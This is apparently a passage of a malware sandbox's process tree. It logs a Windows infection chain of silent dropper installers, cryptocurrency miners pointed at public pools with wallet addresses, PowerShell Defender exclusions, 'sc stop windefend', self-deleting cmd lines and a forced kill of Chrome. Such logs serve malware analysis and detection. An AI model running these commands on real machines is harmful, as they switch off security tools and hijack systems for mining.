        "C:\Users\Admin\AppData\Roaming\A48F.tmp.exe"
        18⤵
        
        PID:6380
        
        C:\Users\Admin\AppData\Roaming\A48F.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A48F.tmp.exe"
        19⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Roaming\B2D8.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\B2D8.tmp.exe"
        18⤵
        
        PID:6072
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:720
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:8852
        
        C:\Users\Admin\AppData\Roaming\BB55.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\BB55.tmp.exe"
        18⤵
        
        PID:8112
        
        C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\BB55.tmp.exe
        19⤵
        
        PID:8564
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        20⤵
        Delays execution with timeout.exe
        
        PID:6476
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        18⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:832
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
        17⤵
        
        PID:7452
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kumtng2p.jnw\Four.exe & exit
        15⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\kumtng2p.jnw\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\kumtng2p.jnw\Four.exe
        16⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\GGCZZA6JZA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GGCZZA6JZA\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\GGCZZA6JZA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GGCZZA6JZA\multitimer.exe" 1 3.1617432673.60681061b11e9 104
        18⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\GGCZZA6JZA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\GGCZZA6JZA\multitimer.exe" 2 3.1617432673.60681061b11e9
        19⤵
        
        PID:7584
        
        C:\Users\Admin\AppData\Local\Temp\yq4c404ku3p\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yq4c404ku3p\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:6444
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:6592
        
        C:\Users\Admin\AppData\Local\Temp\eb17c6ea-9041-4107-be97-47dd4580e7e0\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eb17c6ea-9041-4107-be97-47dd4580e7e0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\eb17c6ea-9041-4107-be97-47dd4580e7e0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        22⤵
        
        PID:5656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\eb17c6ea-9041-4107-be97-47dd4580e7e0\test.bat"
        23⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        22⤵
        
        PID:8804
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        22⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        23⤵
        Delays execution with timeout.exe
        
        PID:8340
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        22⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:8476
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\tnhit5e4wvj\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tnhit5e4wvj\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\is-9KDKA.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9KDKA.tmp\vict.tmp" /SL5="$106D4,870426,780800,C:\Users\Admin\AppData\Local\Temp\tnhit5e4wvj\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\is-44SKM.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-44SKM.tmp\win1host.exe" 535
        22⤵
        
        PID:8680
        
        C:\Users\Admin\AppData\Local\Temp\aogzaqdkfws\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\aogzaqdkfws\app.exe" /8-23
        20⤵
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\ezlzktygekg\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ezlzktygekg\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:7352
        
        C:\Users\Admin\AppData\Local\Temp\is-087BM.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-087BM.tmp\Setup3310.tmp" /SL5="$10740,138429,56832,C:\Users\Admin\AppData\Local\Temp\ezlzktygekg\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7580
        
        C:\Users\Admin\AppData\Local\Temp\is-QVCAO.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QVCAO.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\y1lfedhbei3\gvzu4pmyant.exe
        
        "C:\Users\Admin\AppData\Local\Temp\y1lfedhbei3\gvzu4pmyant.exe" /ustwo INSTALL
        20⤵
        
        PID:8224
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gvzu4pmyant.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\y1lfedhbei3\gvzu4pmyant.exe" & exit
        21⤵
        
        PID:6300
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gvzu4pmyant.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:8964
        
        C:\Users\Admin\AppData\Local\Temp\fa-aca3b-cb2-64d90-cad4c79ba66f5\Lutuzhoqycae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fa-aca3b-cb2-64d90-cad4c79ba66f5\Lutuzhoqycae.exe"
        14⤵
        
        PID:3676
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2288
        15⤵
        
        PID:7928
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:4768
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"
        11⤵
        
        PID:3836
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:1216
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        11⤵
        
        PID:1912
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        12⤵
        
        PID:6036
        
        C:\Users\Admin\Videos\lilal.exe
        
        "C:\Users\Admin\Videos\lilal.exe"
        13⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        14⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui
        14⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        15⤵
        
        PID:6684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6036 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        13⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 6036
        14⤵
        Kills process with taskkill
        
        PID:7884
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        14⤵
        
        PID:6152
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\463KF6V2L5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\463KF6V2L5\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\463KF6V2L5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\463KF6V2L5\multitimer.exe" 1 3.1617432520.60680fc81d53c 103
        13⤵
        
        PID:440
        
        C:\Users\Admin\AppData\Local\Temp\463KF6V2L5\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\463KF6V2L5\multitimer.exe" 2 3.1617432520.60680fc81d53c
        14⤵
        
        PID:7044
        
        C:\Users\Admin\AppData\Local\Temp\xpqlxxuvsvi\hdovcfisy0m.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xpqlxxuvsvi\hdovcfisy0m.exe" /ustwo INSTALL
        15⤵
        
        PID:6772
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "hdovcfisy0m.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xpqlxxuvsvi\hdovcfisy0m.exe" & exit
        16⤵
        
        PID:7872
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "hdovcfisy0m.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\qc0wpvuvp4c\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qc0wpvuvp4c\app.exe" /8-23
        15⤵
        Checks whether UAC is enabled
        Modifies registry class
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\qc0wpvuvp4c\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qc0wpvuvp4c\app.exe" /8-23
        16⤵
        
        PID:96
        
        C:\Users\Admin\AppData\Local\Temp\arn44coypce\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\arn44coypce\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:540
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\618d2904-ad5b-495b-a410-feb8c8023d33\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\618d2904-ad5b-495b-a410-feb8c8023d33\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\618d2904-ad5b-495b-a410-feb8c8023d33\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        17⤵
        
        PID:7892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\618d2904-ad5b-495b-a410-feb8c8023d33\test.bat"
        18⤵
        
        PID:7488
        
        C:\Windows\system32\sc.exe
        
        sc stop windefend
        19⤵
        
        PID:5136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        17⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        17⤵
        
        PID:6188
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        18⤵
        Delays execution with timeout.exe
        
        PID:7800
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        17⤵
        
        PID:7500
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:2136
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:7940
        
        C:\Users\Admin\AppData\Local\Temp\4ooyhh302d5\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4ooyhh302d5\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\is-9CJVG.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9CJVG.tmp\vict.tmp" /SL5="$702AE,870426,780800,C:\Users\Admin\AppData\Local\Temp\4ooyhh302d5\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\is-J3TAV.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-J3TAV.tmp\win1host.exe" 535
        17⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\om05vg4eobm\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\om05vg4eobm\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:7364
        
        C:\Users\Admin\AppData\Local\Temp\is-5O7U5.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5O7U5.tmp\Setup3310.tmp" /SL5="$4033C,138429,56832,C:\Users\Admin\AppData\Local\Temp\om05vg4eobm\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\is-AF6FJ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-AF6FJ.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\yse2nj44v2q\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yse2nj44v2q\vpn.exe" /silent /subid=482
        15⤵
        
        PID:836
        
        C:\Users\Admin\AppData\Local\Temp\is-BOL7F.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BOL7F.tmp\vpn.tmp" /SL5="$30468,15170975,270336,C:\Users\Admin\AppData\Local\Temp\yse2nj44v2q\vpn.exe" /silent /subid=482
        16⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\YD4T6VYA09\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YD4T6VYA09\setups.exe" ll
        12⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Local\Temp\is-IDA9E.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IDA9E.tmp\setups.tmp" /SL5="$50412,635399,250368,C:\Users\Admin\AppData\Local\Temp\YD4T6VYA09\setups.exe" ll
        13⤵
        
        PID:5904
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:768
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:5492
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:5916
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:5464
        
        C:\Users\Admin\AppData\Local\Temp\is-RBUFJ.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RBUFJ.tmp\lylal220.tmp" /SL5="$304DA,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        12⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\is-TPAGJ.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-TPAGJ.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:5704
        
        C:\Program Files\VideoLAN\YZTZSEJTDQ\irecord.exe
        
        "C:\Program Files\VideoLAN\YZTZSEJTDQ\irecord.exe" /VERYSILENT
        14⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\is-DKMES.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DKMES.tmp\irecord.tmp" /SL5="$B0142,6265333,408064,C:\Program Files\VideoLAN\YZTZSEJTDQ\irecord.exe" /VERYSILENT
        15⤵
        
        PID:6468
        
        C:\Users\Admin\AppData\Local\Temp\b0-43c3f-ac1-e48b3-26555c26a4577\Goshivaevaemi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b0-43c3f-ac1-e48b3-26555c26a4577\Goshivaevaemi.exe"
        14⤵
        
        PID:6860
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 780
        15⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Local\Temp\16-32910-af5-96b8b-c57e279f8bbac\Naegufusalo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\16-32910-af5-96b8b-c57e279f8bbac\Naegufusalo.exe"
        14⤵
        
        PID:6864
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l0cqqozd.3cf\md6_6ydj.exe & exit
        15⤵
        
        PID:7400
        
        C:\Users\Admin\AppData\Local\Temp\l0cqqozd.3cf\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\l0cqqozd.3cf\md6_6ydj.exe
        16⤵
        
        PID:7900
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fgxg1ddo.m5r\askinstall31.exe & exit
        15⤵
        
        PID:7796
        
        C:\Users\Admin\AppData\Local\Temp\fgxg1ddo.m5r\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\fgxg1ddo.m5r\askinstall31.exe
        16⤵
        
        PID:6572
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:6912
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3kbyurug.j21\toolspab1.exe & exit
        15⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\3kbyurug.j21\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\3kbyurug.j21\toolspab1.exe
        16⤵
        
        PID:7008
        
        C:\Users\Admin\AppData\Local\Temp\3kbyurug.j21\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\3kbyurug.j21\toolspab1.exe
        17⤵
        
        PID:7524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xevz2dsh.lzi\setup_10.2_mix.exe & exit
        15⤵
        
        PID:8888
        
        C:\Users\Admin\AppData\Local\Temp\xevz2dsh.lzi\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\xevz2dsh.lzi\setup_10.2_mix.exe
        16⤵
        
        PID:9120
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u1nps5rh.phh\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:9208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqztuavc.sor\app.exe /8-2222 & exit
        15⤵
        
        PID:7140
        
        C:\Users\Admin\AppData\Local\Temp\xqztuavc.sor\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\xqztuavc.sor\app.exe /8-2222
        16⤵
        
        PID:7668
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0hbhq4g1.1j0\file.exe & exit
        15⤵
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\0hbhq4g1.1j0\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\0hbhq4g1.1j0\file.exe
        16⤵
        
        PID:8668
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        17⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Local\Temp\3IOFQ24FA0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3IOFQ24FA0\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\3IOFQ24FA0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3IOFQ24FA0\multitimer.exe" 1 3.1617432812.606810ec94fb5 101
        19⤵
        
        PID:8140
        
        C:\Users\Admin\AppData\Local\Temp\3IOFQ24FA0\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3IOFQ24FA0\multitimer.exe" 2 3.1617432812.606810ec94fb5
        20⤵
        
        PID:8540
        
        C:\Users\Admin\AppData\Local\Temp\qa0orf4nd2w\edlnmuhshja.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qa0orf4nd2w\edlnmuhshja.exe" /ustwo INSTALL
        21⤵
        
        PID:6656
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "edlnmuhshja.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\qa0orf4nd2w\edlnmuhshja.exe" & exit
        22⤵
        
        PID:6916
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "edlnmuhshja.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:9568
        
        C:\Users\Admin\AppData\Local\Temp\qtdth5efdmn\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qtdth5efdmn\app.exe" /8-23
        21⤵
        
        PID:8796
        
        C:\Users\Admin\AppData\Local\Temp\i1olm1slazu\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\i1olm1slazu\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\fbc2b2f3-73e1-4d7e-be65-81dcf1924713\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fbc2b2f3-73e1-4d7e-be65-81dcf1924713\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fbc2b2f3-73e1-4d7e-be65-81dcf1924713\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        23⤵
        
        PID:10132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fbc2b2f3-73e1-4d7e-be65-81dcf1924713\test.bat"
        24⤵
        
        PID:7412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force
        23⤵
        
        PID:9660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout 1
        23⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        24⤵
        Delays execution with timeout.exe
        
        PID:8256
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        23⤵
        
        PID:10116
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 1428
        23⤵
        Program crash
        
        PID:9108
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:6676
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\k1acffgyq1o\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\k1acffgyq1o\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\is-2L654.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2L654.tmp\vict.tmp" /SL5="$303EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\k1acffgyq1o\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:8428
        
        C:\Users\Admin\AppData\Local\Temp\is-JIF14.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JIF14.tmp\win1host.exe" 535
        23⤵
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\kferepam4e0\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kferepam4e0\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\is-1A5QO.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1A5QO.tmp\Setup3310.tmp" /SL5="$303FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\kferepam4e0\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\is-DA5U3.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DA5U3.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\2MWQGFWZ1X\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2MWQGFWZ1X\setups.exe" ll
        18⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\is-IV3VF.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IV3VF.tmp\setups.tmp" /SL5="$3074A,635399,250368,C:\Users\Admin\AppData\Local\Temp\2MWQGFWZ1X\setups.exe" ll
        19⤵
        
        PID:6472
        
